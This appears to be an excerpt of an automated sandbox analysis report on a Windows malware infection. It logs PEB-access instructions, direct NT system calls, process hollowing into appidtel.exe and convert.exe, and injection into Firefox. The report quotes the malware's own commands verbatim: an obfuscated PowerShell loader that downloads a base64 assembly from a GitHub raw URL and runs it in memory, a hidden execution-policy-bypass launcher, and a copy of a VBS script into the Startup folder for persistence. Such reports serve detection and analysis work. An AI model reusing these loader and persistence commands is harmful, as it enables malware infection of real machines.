Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FC0F0 mov eax, dword ptr fs:[00000030h] 10_2_038FC0F0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0391E016 mov eax, dword ptr fs:[00000030h] 10_2_0391E016
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03984000 mov ecx, dword ptr fs:[00000030h] 10_2_03984000
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039C903E mov eax, dword ptr fs:[00000030h] 10_2_039C903E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FA020 mov eax, dword ptr fs:[00000030h] 10_2_038FA020
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FC020 mov eax, dword ptr fs:[00000030h] 10_2_038FC020
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03902050 mov eax, dword ptr fs:[00000030h] 10_2_03902050
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0392B052 mov eax, dword ptr fs:[00000030h] 10_2_0392B052
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039A705E mov ebx, dword ptr fs:[00000030h] 10_2_039A705E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039A705E mov eax, dword ptr fs:[00000030h] 10_2_039A705E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03986050 mov eax, dword ptr fs:[00000030h] 10_2_03986050
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03911070 mov eax, dword ptr fs:[00000030h] 10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03911070 mov ecx, dword ptr fs:[00000030h] 10_2_03911070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0392C073 mov eax, dword ptr fs:[00000030h] 10_2_0392C073
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0397D070 mov ecx, dword ptr fs:[00000030h] 10_2_0397D070
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0398106E mov eax, dword ptr fs:[00000030h] 10_2_0398106E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D5060 mov eax, dword ptr fs:[00000030h] 10_2_039D5060
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039BF78A mov eax, dword ptr fs:[00000030h] 10_2_039BF78A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0392D7B0 mov eax, dword ptr fs:[00000030h] 10_2_0392D7B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D37B6 mov eax, dword ptr fs:[00000030h] 10_2_039D37B6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039897A9 mov eax, dword ptr fs:[00000030h] 10_2_039897A9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FF7BA mov eax, dword ptr fs:[00000030h] 10_2_038FF7BA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0398F7AF mov eax, dword ptr fs:[00000030h] 10_2_0398F7AF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039007AF mov eax, dword ptr fs:[00000030h] 10_2_039007AF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0390C7C0 mov eax, dword ptr fs:[00000030h] 10_2_0390C7C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039057C0 mov eax, dword ptr fs:[00000030h] 10_2_039057C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039807C3 mov eax, dword ptr fs:[00000030h] 10_2_039807C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039047FB mov eax, dword ptr fs:[00000030h] 10_2_039047FB
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0390D7E0 mov ecx, dword ptr fs:[00000030h] 10_2_0390D7E0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0398E7E1 mov eax, dword ptr fs:[00000030h] 10_2_0398E7E1
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039227ED mov eax, dword ptr fs:[00000030h] 10_2_039227ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03900710 mov eax, dword ptr fs:[00000030h] 10_2_03900710
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03930710 mov eax, dword ptr fs:[00000030h] 10_2_03930710
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393F71F mov eax, dword ptr fs:[00000030h] 10_2_0393F71F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03905702 mov eax, dword ptr fs:[00000030h] 10_2_03905702
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03907703 mov eax, dword ptr fs:[00000030h] 10_2_03907703
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393C700 mov eax, dword ptr fs:[00000030h] 10_2_0393C700
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039DB73C mov eax, dword ptr fs:[00000030h] 10_2_039DB73C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0397C730 mov eax, dword ptr fs:[00000030h] 10_2_0397C730
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03935734 mov eax, dword ptr fs:[00000030h] 10_2_03935734
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0390973A mov eax, dword ptr fs:[00000030h] 10_2_0390973A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393273C mov eax, dword ptr fs:[00000030h] 10_2_0393273C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393273C mov ecx, dword ptr fs:[00000030h] 10_2_0393273C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03903720 mov eax, dword ptr fs:[00000030h] 10_2_03903720
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0391F720 mov eax, dword ptr fs:[00000030h] 10_2_0391F720
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393C720 mov eax, dword ptr fs:[00000030h] 10_2_0393C720
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039BF72E mov eax, dword ptr fs:[00000030h] 10_2_039BF72E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039C972B mov eax, dword ptr fs:[00000030h] 10_2_039C972B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038F9730 mov eax, dword ptr fs:[00000030h] 10_2_038F9730
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03900750 mov eax, dword ptr fs:[00000030h] 10_2_03900750
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942750 mov eax, dword ptr fs:[00000030h] 10_2_03942750
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0398E75D mov eax, dword ptr fs:[00000030h] 10_2_0398E75D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03984755 mov eax, dword ptr fs:[00000030h] 10_2_03984755
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03913740 mov eax, dword ptr fs:[00000030h] 10_2_03913740
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039D3749 mov eax, dword ptr fs:[00000030h] 10_2_039D3749
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393674D mov esi, dword ptr fs:[00000030h] 10_2_0393674D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393674D mov eax, dword ptr fs:[00000030h] 10_2_0393674D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03908770 mov eax, dword ptr fs:[00000030h] 10_2_03908770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03910770 mov eax, dword ptr fs:[00000030h] 10_2_03910770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FB765 mov eax, dword ptr fs:[00000030h] 10_2_038FB765
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03904690 mov eax, dword ptr fs:[00000030h] 10_2_03904690
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0398368C mov eax, dword ptr fs:[00000030h] 10_2_0398368C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039366B0 mov eax, dword ptr fs:[00000030h] 10_2_039366B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FD6AA mov eax, dword ptr fs:[00000030h] 10_2_038FD6AA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393C6A6 mov eax, dword ptr fs:[00000030h] 10_2_0393C6A6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038F76B2 mov eax, dword ptr fs:[00000030h] 10_2_038F76B2
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0390B6C0 mov eax, dword ptr fs:[00000030h] 10_2_0390B6C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039C16CC mov eax, dword ptr fs:[00000030h] 10_2_039C16CC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393A6C7 mov ebx, dword ptr fs:[00000030h] 10_2_0393A6C7
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393A6C7 mov eax, dword ptr fs:[00000030h] 10_2_0393A6C7
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039BF6C7 mov eax, dword ptr fs:[00000030h] 10_2_039BF6C7
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039316CF mov eax, dword ptr fs:[00000030h] 10_2_039316CF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0397E6F2 mov eax, dword ptr fs:[00000030h] 10_2_0397E6F2
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039806F1 mov eax, dword ptr fs:[00000030h] 10_2_039806F1
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039BD6F0 mov eax, dword ptr fs:[00000030h] 10_2_039BD6F0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0392D6E0 mov eax, dword ptr fs:[00000030h] 10_2_0392D6E0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039936EE mov eax, dword ptr fs:[00000030h] 10_2_039936EE
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_039336EF mov eax, dword ptr fs:[00000030h] 10_2_039336EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03903616 mov eax, dword ptr fs:[00000030h] 10_2_03903616
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03942619 mov eax, dword ptr fs:[00000030h] 10_2_03942619
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0393F603 mov eax, dword ptr fs:[00000030h] 10_2_0393F603
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_03931607 mov eax, dword ptr fs:[00000030h] 10_2_03931607
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0391260B mov eax, dword ptr fs:[00000030h] 10_2_0391260B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_0397E609 mov eax, dword ptr fs:[00000030h] 10_2_0397E609
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 10_2_038FF626 mov eax, dword ptr fs:[00000030h] 10_2_038FF626

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtTerminateThread: Direct from: 0x77382FCC Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\appidtel.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\appidtel.exe Section loaded: NULL target: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe protection: execute and read and write
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Section loaded: NULL target: C:\Windows\SysWOW64\appidtel.exe protection: execute and read and write
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Section loaded: NULL target: C:\Windows\SysWOW64\convert.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\convert.exe Section loaded: NULL target: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe protection: read write
Source: C:\Windows\SysWOW64\convert.exe Section loaded: NULL target: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\convert.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\convert.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\convert.exe Thread register set: target process: 1756
Source: C:\Windows\SysWOW64\convert.exe Thread APC queued: target process: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\appidtel.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\appidtel.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\appidtel.exe base: 303A008
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
Source: C:\Windows\SysWOW64\convert.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\payment.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ((('h'+'rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/no'+'detecto'+'n/nodetecton/refs/heads/main/de'+'tahnoth-'+'v.txth3k; hr'+'fb'+'ase64'+'content ='+' (ne'+'w-object syste'+'m.n'+'et.web'+'client).downloadstr'+'ing'+'(hr'+'furl); hr'+'fbinar'+'yc'+'ontent = [s'+'y'+'stem.conver'+'t]:'+':fromba'+'s'+'e64str'+'ing(h'+'rfb'+'a'+'s'+'e64co'+'ntent'+')'+'; h'+'rfa'+'ss'+'embly = [refle'+'ction'+'.assembly'+']::load(hrfbinarycontent); [d'+'nlib'+'.io.home]::vai('+'cut0/o'+'1fks/d/ee.etsap'+'//:sptth'+'cut, cu'+'td'+'esativadocut,'+' '+'cu'+'tdesativadocut, '+'cutde'+'sativadocut, cutd'+'es'+'at'+'iva'+'do'+'cut,'+' c'+'ut1c'+'ut, cutappidtelcut)') -creplace'cut',[char]34 -replace ([char]104+[char]82+[char]102),[char]36 -replace([char]104+[char]51+[char]107),[char]39))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\payment.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'swv4icgokcdojysnumz1jysncmwgpsbom2todhrwczonkycvlycrj3jhjysndy4nkydnaxrodscrj2j1jysnc2vyjysny29udgvujysndc5jb20nkycvtm8nkydezxrly3rpjysnbi9ob0rldgvjde9ul3jlznmvagvhzhmvbwfpbi9ezscrj3rhae5vdggtjysnvi50ehrom2s7ighsjysnzminkydhc2u2nccrj0nvbnrlbnqgpscrjyaotmunkyd3lu9iamvjdcbtexn0zscrj20uticrj2v0lldlyicrj0nsawvudckurg93bmxvywrtdhinkydpbmcnkycoafinkydmdxjsktsgafinkydmymluyxinkyd5qycrj29udgvudca9ifttjysnescrj3n0zw0uq29udmvyjysndf06jysnokzyb21cyscrj3mnkydlnjrtdhinkydpbmcoaccrj1jmyicrj2enkydzjysnzty0q28nkydudgvudccrjyknkyc7iggnkydszmenkydzcycrj2vtymx5id0gw1jlzmxljysny3rpb24nkycuqxnzzw1ibhknkyddojpmb2fkkghszmjpbmfyeunvbnrlbnqpoybbzccrj25sawinkycusu8usg9tzv06olzbssgnkydddxqwl08nkycxrkttl2qvzwuuzxrzyxankycvlzpzchr0accrj0n1dcwgq3unkyd0zccrj2vzyxrpdmfkb0n1dcwnkycgjysnq3unkyd0zgvzyxrpdmfkb0n1dcwgjysnq3v0zgunkydzyxrpdmfkb0n1dcwgq3v0zccrj2vzjysnyxqnkydpdmenkydkbycrj0n1dcwnkycgqycrj3v0mumnkyd1dcwgq3v0yxbwawr0zwxddxqpjykgic1jukvwbefjrsdddxqnlftjsefsxtm0icatukvwtefdzsagkftjsefsxtewnctby0hbul04mitby0hbul0xmdiplftjsefsxtm2icatukvwtefdzshby0hbul0xmdqrw2niqvjdnterw2niqvjdmta3ksxby0hbul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
